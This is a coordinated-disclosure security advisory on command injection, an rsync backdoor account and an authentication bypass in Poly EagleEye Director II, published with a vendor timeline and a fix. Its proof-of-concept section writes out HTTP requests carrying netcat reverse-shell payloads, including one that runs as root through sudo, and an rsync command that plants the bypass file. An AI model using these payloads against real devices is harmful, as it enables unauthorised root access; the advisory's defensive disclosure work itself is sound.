Multiple Critical Vulnerabilities in Poly EagleEye Director II


Multiple Critical Vulnerabilities


Poly EagleEye Director II

Vulnerable Version (Jul 1, 2021)

Fixed Version or higher

CVE Number

CVE-2022-26479, CVE-2022-26482






Johannes Kruchem (Office Vienna) | SEC Consult Vulnerability Lab

Poly's Eagle Eye Director II is vulnerable to multiple authenticated OS command injection vulnerabilities. In combination with an undocumented authentication bypass vulnerability, an rsync backdoor account and sudo privileges, it was possible to execute commands with the highest privileges without authentication.

Vendor description

"Why settle for a one-size-fits-all view of your conference room? EagleEye Director II takes video conferencing and conference room web cameras to the next level—with people-tracking technology and automatic zoom. You’ll find that when people aren’t worrying about staying in camera view or how to work a remote control, they stay focused on the bigger issue—solving critical business problems." 


Business recommendation

The vendor provides a patch which should be installed immediately. 

Vulnerability overview/description 

1) Multiple Authenticated Command Injection Vulnerabilities (CVE-2022-26482) 

When logged on to the administration web interface, command injection payloads can be inserted in at least four different fields. This happens because the user input is not escaped and gets concatenated with a string which is executed afterwards with "os.system()". The webserver was started as "www-data" who has sudo privileges.  

2) Authentication Bypass (CVE-2022-26479) 

The authentication can be bypassed by creating a specific file on the file system. If this file is created, every API call is executed as admin with no further authentication (sessionid). This behavior could not be found in any documentation. The creation of this file was possible with rsync for which a backdoor account was found. The rsync daemon runs on port 873 and provides the modules "/flag" and "/update".  

The combination of 1) and 2) leads to an privileged unauthenticated OS command injection. 

Proof of concept

1) Multiple Authenticated Command Injection Vulnerabilities (CVE-2022-26482) 

When logged into the web interface, the name of the device can be changed in the settings. A command can be injected with $(<command>) in the name. To bypass the length-limit the payload can be changed in the POST request, which looks as follows: 

POST /api/deviceName HTTP/1.1 
Cookie: sessionid=ovizy1tgavf9ipd2ha1g6zu379oopqcn; 
Connection: close 

{"deviceName":"EEDII-Master $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 8888>/tmp/f)"} 

It looks as follows on the host system, where an nc listener was started: 

$ nc -lvp 8888 
connect to [] from (UNKNOWN) [] 
$ whoami 

Sudo allowed executing commands as root: 

$ sudo whoami 

Also the following request results in command execution. This request was not intercepted but reconstructed from the source code of the application. 

POST /api/region HTTP/1.1 
Cookie: sessionid=ovizy1tgavf9ipd2ha1g6zu379oopqcn; 
Content-Length: 45 

{"region":"$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 9999 >/tmp/f)"} 

When enabling 802.1X, one can see that the payload "sudo sh" works as well. In this case an attacker is root immediately: 

POST /api/region HTTP/1.1 
Cookie: sessionid=ovizy1tgavf9ipd2ha1g6zu379oopqcn; 
Content-Length: 45 

{"region":"$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 9999 >/tmp/f)"} 

When generating a certificate, the following payload can be injected to execute a reverse shell: 

POST /api/certificate HTTP/1.1 
Cookie:; sessionid=vxxs25a2mcn5xz4ndjao9noogpqc7yy2 

Connection: close 

{"name":"\n","country":"US","province":"California","city":"San Jose","organization":"Polycom Inc. \":\"$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sudo sh -i 2>&1|nc 7777 >/tmp/f)","organizationUnit":"Video Division"} 

2) Authentication Bypass (CVE-2022-26479) 

Step 1 - Find the rsync backdoor account 

The rsync modules "/flag" and "/update" are configured to require authentication. In the rsync config file "/etc/rsyncd.conf" the file "/etc/rsyncd.scrt" was set as secrets file which contains the following "user:password" in plain text. This user was not found in any documentation: 

visage:<PoC removed> 

Step 2 - Find the authentication bypass 

The source code in "/www/DjangoTest/TestApp/" contains the following code snippet: 

def checkCookie(request): 
  filename = "/data/local/tmp/runAutomationFlag" 
  if (os.path.exists(filename)):"run automation, do not check cookie") 
    return "success" 

If the file "runAutomationFlag" exists in "/data/local/tmp", the cookie is not going to be checked anymore. Coincidentally, the rsync module "/flag" is configured for the path "/data/local" so a "/tmp" needs to be attached. To exploit this authentication bypass the runAutomationFlag file can be copied to the remote path as follows: 

$ touch runAutomationFlag 
$ rsync -av ./runAutomationFlag rsync://visage@ 
sending incremental file list 

Now the file is in the specific location: 

$ pwd  
$ ls 

The payloads from 1) can now be sent unauthenticated since the cookies are not checked anymore. This behavior is not documented. 

Vulnerable / tested versions

Version (Jul 1, 2021) was found to be vulnerable. 

Vendor contact timeline

2021-07-14 Contacting vendor through PSIRT email.
2021-07-15 Vendor sent PGP key.
2021-07-16 Advisory was sent to the vendor.
2021-07 to 2022-03 Further coordination with multiple emails and meetings.
2022-03-18 Vendor provides draft advisory.
2022-03 - 2022-06 Patch already available, waiting for vendor advisory release.
2022-06-01 Coordinated release of security advisory.


Update to firmware version or higher. 

The firmware can be downloaded from the vendor's support page:

This issue has been documented in the vendor's security advisory PLYPL21-12:



Advisory URL:

EOF Johannes Kruchem / @2022

Interested to work with the experts of SEC Consult? 

Send us your application 

Interested in improving your cyber security with the experts of SEC Consult? 

Contact our local offices